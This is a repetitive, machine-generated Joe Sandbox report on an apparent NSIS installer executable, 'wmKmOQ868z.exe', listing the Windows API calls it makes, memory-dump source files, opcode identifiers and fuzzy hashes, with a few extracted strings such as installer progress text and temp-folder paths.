                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                          • Instruction ID: 280cd4c212b49affc14266408846aa3a30e7e9a640caac8a44b81d30c287abca
                                          • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                          • Instruction Fuzzy Hash: E1E08C3221025AABCF109E908C01EEB7B6CEB043A0F014433FD16EB051D230E8319BA8
                                          APIs
                                          • VirtualProtect.KERNELBASE(6F70505C,00000004,00000040,6F70504C), ref: 6F702A9D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2686110588.000000006F701000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F700000, based on PE: true
                                          • Associated: 00000000.00000002.2686088914.000000006F700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000000.00000002.2686134312.000000006F704000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000000.00000002.2686197105.000000006F706000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f700000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 7225e482233595f9b9b2d76719a181f967907d1ecc4120d982c4500bc6e834e4
                                          • Instruction ID: df23b4e066a3e4b9756b1b35315ad7344a7162aa907198875bcebf3ccfc80bd7
                                          • Opcode Fuzzy Hash: 7225e482233595f9b9b2d76719a181f967907d1ecc4120d982c4500bc6e834e4
                                          • Instruction Fuzzy Hash: 87F079F0A05A80DEDB50DF3CA544A0E3BE0BF9A325B14857FA188D6240EB744964DB99
                                          APIs
                                          • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,0040644F,?,?,?,?,Call,?,00000000), ref: 004063E5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                          • Instruction ID: e359b3f9d4e5954a9af9fcfc08987e0780d6658b6568ce36bf776d9a1ed3ba47
                                          • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                          • Instruction Fuzzy Hash: 5AD0123210020DBBDF115F90AD01FAB771DAB08310F014826FE17E40D0D775D530A7A4
                                          APIs
                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00403267,?), ref: 004034F5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                          • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                          • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                          • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                          APIs
                                          • SendMessageW.USER32(00000028,?,00000001,00404333), ref: 00404516
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: d8acea26a230a6f6dce64032923e754adb325d86aa568b2d6d5b5dd5df397682
                                          • Instruction ID: c6ab7f6cffe81da1172822363f1dd48ca364d348eecf8336b79a6db78a7c4a26
                                          • Opcode Fuzzy Hash: d8acea26a230a6f6dce64032923e754adb325d86aa568b2d6d5b5dd5df397682
                                          • Instruction Fuzzy Hash: 18B09235184A00ABDA515B00DE09F467B62E7A4701F008538B240640F0CBB200A0DB0A
                                          APIs
                                          • GlobalAlloc.KERNELBASE(00000040,?,6F7012DB,?,6F70137F,00000019,6F7011CA,-000000A0), ref: 6F7012C5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2686110588.000000006F701000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F700000, based on PE: true
                                          • Associated: 00000000.00000002.2686088914.000000006F700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000000.00000002.2686134312.000000006F704000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000000.00000002.2686197105.000000006F706000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f700000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: AllocGlobal
                                          • String ID:
                                          • API String ID: 3761449716-0
                                          • Opcode ID: 830f6c55505ddaff827372723d92ac7f1dbb208f2e885a1ca6190ce2ec3c81b3
                                          • Instruction ID: 1d0e230721195f36998b874015351d8f19f16bf5456197cee80b6c3567ab0f85
                                          • Opcode Fuzzy Hash: 830f6c55505ddaff827372723d92ac7f1dbb208f2e885a1ca6190ce2ec3c81b3
                                          • Instruction Fuzzy Hash: 35B012F07004009FFE008F28EC0EF383254FF81310F040065B600D1040C9204C20852C
                                          APIs
                                            • Part of subcall function 6F7012BB: GlobalAlloc.KERNELBASE(00000040,?,6F7012DB,?,6F70137F,00000019,6F7011CA,-000000A0), ref: 6F7012C5
                                          • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6F701D2D
                                          • lstrcpyW.KERNEL32(00000008,?), ref: 6F701D75
                                          • lstrcpyW.KERNEL32(00000808,?), ref: 6F701D7F
                                          • GlobalFree.KERNEL32(00000000), ref: 6F701D92
                                          • GlobalFree.KERNEL32(?), ref: 6F701E74
                                          • GlobalFree.KERNEL32(?), ref: 6F701E79
                                          • GlobalFree.KERNEL32(?), ref: 6F701E7E
                                          • GlobalFree.KERNEL32(00000000), ref: 6F702068
                                          • lstrcpyW.KERNEL32(?,?), ref: 6F702222
                                          • GetModuleHandleW.KERNEL32(00000008), ref: 6F7022A1
                                          • LoadLibraryW.KERNEL32(00000008), ref: 6F7022B2
                                          • GetProcAddress.KERNEL32(?,?), ref: 6F70230C
                                          • lstrlenW.KERNEL32(00000808), ref: 6F702326
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2686110588.000000006F701000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F700000, based on PE: true
                                          • Associated: 00000000.00000002.2686088914.000000006F700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000000.00000002.2686134312.000000006F704000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000000.00000002.2686197105.000000006F706000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f700000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                          • String ID:
                                          • API String ID: 245916457-0
                                          • Opcode ID: 91305c343bb382e2fec39ac24642962a20d28e55679c1854dbb5b3741f9db2ab
                                          • Instruction ID: bcca65b95b398c48ac358e260cb7cb60834b1aea0e3150725a6979792b9569fc
                                          • Opcode Fuzzy Hash: 91305c343bb382e2fec39ac24642962a20d28e55679c1854dbb5b3741f9db2ab
                                          • Instruction Fuzzy Hash: 65226AB2D0460ADADB10EFA8C7846EEB7F4FF05319F10467ED165E6280D7B4A681CB90
                                          APIs
                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406335,?,?), ref: 004061D5
                                          • GetShortPathNameW.KERNEL32(?,007A4DE8,00000400), ref: 004061DE
                                            • Part of subcall function 00405FA9: lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000), ref: 00405FB9
                                            • Part of subcall function 00405FA9: lstrlenA.KERNEL32(?,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEB
                                          • GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 004061FB
                                          • wsprintfA.USER32 ref: 00406219
                                          • GetFileSize.KERNEL32(00000000,00000000,007A55E8,C0000000,00000004,007A55E8,?), ref: 00406254
                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406263
                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 0040629B
                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,007A49E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F1
                                          • GlobalFree.KERNEL32(00000000), ref: 00406302
                                          • CloseHandle.KERNEL32(00000000), ref: 00406309
                                            • Part of subcall function 00406044: GetFileAttributesW.KERNELBASE(?,004030E2,C:\Users\user\Desktop\wmKmOQ868z.exe,80000000,00000003), ref: 00406048
                                            • Part of subcall function 00406044: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                          • String ID: %ls=%ls$[Rename]$Mz$Uz
                                          • API String ID: 2171350718-3367237295
                                          • Opcode ID: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
                                          • Instruction ID: b6cadbeacbe634b6bd87c882f2c351c0ea44a21df7cd689b804f2f2a1cba60a5
                                          • Opcode Fuzzy Hash: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
                                          • Instruction Fuzzy Hash: 2F313770600715BBD2206B658D49F6B3A5CDF82714F16003EFE02F72D2DA7D982486BD
                                          APIs
                                          • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\wmKmOQ868z.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00406865
                                          • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C), ref: 00406874
                                          • CharNextW.USER32(?,"C:\Users\user\Desktop\wmKmOQ868z.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00406879
                                          • CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 0040688C
                                          Strings
                                          • *?|<>/":, xrefs: 00406854
                                          • "C:\Users\user\Desktop\wmKmOQ868z.exe", xrefs: 00406846
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00406803
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: Char$Next$Prev
                                          • String ID: "C:\Users\user\Desktop\wmKmOQ868z.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 589700163-3873098128
                                          • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                          • Instruction ID: 8a5b279eb1c6e0cea376d4f623a12da6f674b8daf8575b9a92ef11e753d0d18b
                                          • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                          • Instruction Fuzzy Hash: D111B66780121299DB303B158C44AB766E8EF54794F52C03FED8A732C0E77C4C9286AD
                                          APIs
                                          • GetWindowLongW.USER32(?,000000EB), ref: 00404557
                                          • GetSysColor.USER32(00000000), ref: 00404595
                                          • SetTextColor.GDI32(?,00000000), ref: 004045A1
                                          • SetBkMode.GDI32(?,?), ref: 004045AD
                                          • GetSysColor.USER32(?), ref: 004045C0
                                          • SetBkColor.GDI32(?,?), ref: 004045D0
                                          • DeleteObject.GDI32(?), ref: 004045EA
                                          • CreateBrushIndirect.GDI32(?), ref: 004045F4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                          • String ID:
                                          • API String ID: 2320649405-0
                                          • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                          • Instruction ID: 9e725ab64d6b149d2d2f876944178e70108deb967c5ff43b0f72f150d1bef9aa
                                          • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                          • Instruction Fuzzy Hash: DA2177B1500704AFCB309F78DD18B5BBBF4BF41710B04892EEA96A22E0D739E944CB54
                                          APIs
                                          • lstrlenW.KERNEL32(007A0728,00000000,0079A700,759223A0), ref: 00405611
                                          • lstrlenW.KERNEL32(?,007A0728,00000000,0079A700,759223A0), ref: 00405621
                                          • lstrcatW.KERNEL32(007A0728,?,?,007A0728,00000000,0079A700,759223A0), ref: 00405634
                                          • SetWindowTextW.USER32(007A0728,007A0728), ref: 00405646
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
                                          • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405686
                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                          • String ID:
                                          • API String ID: 2531174081-0
                                          • Opcode ID: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
                                          • Instruction ID: 329114e2e26f34c588cdeed9baab55c5e37b8eaf8a8cec26a94c2fb3a39dc2c1
                                          • Opcode Fuzzy Hash: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
                                          • Instruction Fuzzy Hash: F921B371900618BACF119F65DD449CFBFB8EF95364F10843AF908B22A0C77A4A50CFA8
                                          APIs
                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                          • MulDiv.KERNEL32(000C85B4,00000064,000CAAA8), ref: 00403001
                                          • wsprintfW.USER32 ref: 00403011
                                          • SetWindowTextW.USER32(?,?), ref: 00403021
                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                          Strings
                                          • verifying installer: %d%%, xrefs: 0040300B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: Text$ItemTimerWindowwsprintf
                                          • String ID: verifying installer: %d%%
                                          • API String ID: 1451636040-82062127
                                          • Opcode ID: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
                                          • Instruction ID: 52c7d57b2d50c4e26d0c42f1be749ca1a93388b8845742b28701603c77c86054
                                          • Opcode Fuzzy Hash: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
                                          • Instruction Fuzzy Hash: 89016270640209BBEF209F60DD4AFEE3B79EB04344F10803AFA02B51D0DBB99A559F58
                                          APIs
                                            • Part of subcall function 6F7012BB: GlobalAlloc.KERNELBASE(00000040,?,6F7012DB,?,6F70137F,00000019,6F7011CA,-000000A0), ref: 6F7012C5
                                          • GlobalFree.KERNEL32(?), ref: 6F702743
                                          • GlobalFree.KERNEL32(00000000), ref: 6F702778
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2686110588.000000006F701000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F700000, based on PE: true
                                          • Associated: 00000000.00000002.2686088914.000000006F700000.00000002.00000001.01000000.00000005.sdmpDownload File
